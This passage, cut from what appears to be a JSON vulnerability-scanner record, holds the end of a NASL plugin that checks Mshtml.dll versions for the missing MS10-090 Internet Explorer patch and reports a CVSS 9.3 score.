bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6049\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n )\n{\n set_kb_item(name:\"SMB/Missing/MS10-090\", value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}